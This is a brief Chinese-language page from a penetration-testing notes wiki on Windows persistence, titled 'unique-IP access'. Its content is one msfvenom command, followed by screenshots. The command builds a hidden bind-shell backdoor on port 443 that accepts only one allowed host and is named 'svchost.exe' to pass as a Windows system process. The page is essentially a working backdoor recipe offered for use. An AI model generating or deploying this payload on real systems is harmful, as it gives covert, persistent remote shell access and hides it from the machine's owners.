> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/quan-xian-wei-chi/windows/wei-yi-ip-fang-wen.md).

# 唯一IP访问

```
>msfvenom -p windows/shell_hidden_bind_tcp LPORT=443 AHOST=192.168.0.107 -f exe > svchost.exe
只有当107这台机器连接时可获得shell，其他机器不可以。
```

![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/568.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/569.png) ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/570.png)
